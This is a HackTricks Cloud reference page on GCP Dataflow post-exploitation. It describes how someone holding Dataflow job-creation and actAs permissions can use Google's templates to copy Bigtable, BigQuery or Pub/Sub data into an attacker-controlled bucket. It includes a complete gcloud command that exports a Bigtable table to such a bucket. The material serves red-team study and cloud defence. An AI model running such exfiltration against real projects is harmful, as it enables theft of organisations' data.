GCP - Dataflow Post Exploitation
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Dataflow
For more information about Dataflow check:
Using Dataflow to exfiltrate data from other services
Permissions: dataflow.jobs.create, resourcemanager.projects.get, iam.serviceAccounts.actAs (over a SA with access to source and sink)
With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the Dataflow Rider privilege escalation (pipeline takeover via bucket write).
Note
You need
iam.serviceAccounts.actAsover a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified.
Bigtable to GCS
See GCP - Bigtable Post Exploitation — “Dump rows to your bucket” for the full pattern. Templates: Cloud_Bigtable_to_GCS_Json, Cloud_Bigtable_to_GCS_Parquet, Cloud_Bigtable_to_GCS_SequenceFile.
Export Bigtable to attacker-controlled bucket
gcloud dataflow jobs run <job-name> \
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
--project=<PROJECT> \
--region=<REGION> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
--staging-location=gs://<YOUR_BUCKET>/staging/
BigQuery to GCS
Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
Pub/Sub and streaming sources
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
References
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.


